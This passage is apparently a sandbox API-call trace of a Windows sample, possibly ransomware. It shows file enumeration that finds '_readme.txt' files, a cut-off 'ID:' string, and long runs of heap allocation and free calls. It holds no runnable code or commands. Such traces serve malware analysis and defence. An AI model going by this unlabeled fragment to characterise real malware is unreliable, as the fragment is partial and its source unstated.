ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" [0127.824] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9160 | out: hHeap=0x4970000) returned 1 [0127.824] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xe36a3580, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe36a3580, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0127.824] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe36a3580, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe36a3580, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe36a3580, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0127.824] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe36a3580, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe36a3580, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe36a3580, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0127.824] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0127.824] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.824] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.825] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9048 | out: hHeap=0x4970000) returned 1 [0127.825] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d28 [0127.825] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0127.825] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0127.825] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.825] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.825] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d70 | out: hHeap=0x4970000) returned 1 [0127.825] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0127.825] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.825] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.825] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d70 | out: hHeap=0x4970000) returned 1 [0127.825] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0127.825] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.825] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.825] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d70 | out: hHeap=0x4970000) returned 1 [0127.825] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0127.825] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.825] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.825] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d70 | out: hHeap=0x4970000) returned 1 [0127.825] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0127.825] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.825] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.825] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d70 | out: hHeap=0x4970000) returned 1 [0127.825] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0127.825] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.825] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.825] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d70 | out: hHeap=0x4970000) returned 1 [0127.825] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d28 | out: hHeap=0x4970000) returned 1 [0127.825] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9048 [0127.825] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0127.825] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.825] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.826] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.826] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.826] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.826] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.826] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.826] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.826] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.826] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.826] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.826] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.826] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.826] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.826] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.826] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.826] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.826] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.826] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.826] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.826] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.826] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.826] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.826] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.826] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.826] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.826] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0127.826] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.826] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.826] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.826] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.826] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.826] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.827] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.827] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.827] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.827] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.827] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.827] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.827] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.827] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.827] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.827] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.827] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.827] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.827] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.827] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.827] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.827] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.827] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.827] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.827] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.827] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.827] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.827] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.827] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.827] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.827] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.827] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.827] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.827] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.827] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.827] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.827] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.827] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.827] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.828] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.828] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.828] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.828] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.828] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.828] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.828] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.828] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.828] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.828] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.828] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.828] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.828] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.828] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.828] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.828] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.828] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.828] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.828] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.828] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.828] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9048 | out: hHeap=0x4970000) returned 1 [0127.828] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9048 [0127.828] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0127.828] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.828] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.828] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.828] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.828] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.828] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.828] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.829] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.829] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.829] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.829] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.829] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.829] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.829] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.829] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.829] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.829] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.829] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.829] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.829] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.829] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.829] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.829] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.829] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.829] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.829] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.829] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0127.829] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.829] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.829] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.829] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.829] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.829] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.829] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.829] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.829] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.829] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.829] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.830] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.830] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.830] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.830] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.830] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.830] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.830] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.830] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.830] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.830] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.830] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.830] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.830] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.830] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.830] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.830] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.830] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9048 | out: hHeap=0x4970000) returned 1 [0127.830] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c3390 [0127.830] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0127.830] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.830] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.830] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.830] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.830] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.830] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.830] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.830] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.830] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.830] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.830] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.831] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.831] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.831] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.831] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.831] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.831] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.831] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0127.831] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.831] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.831] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.831] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.831] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.831] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.831] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.831] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.831] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.832] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74c35f8 | out: hHeap=0x4970000) returned 1 [0127.832] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x74c35f8 [0127.832] RtlAllocateHeap (HeapHandle=0x4970000, 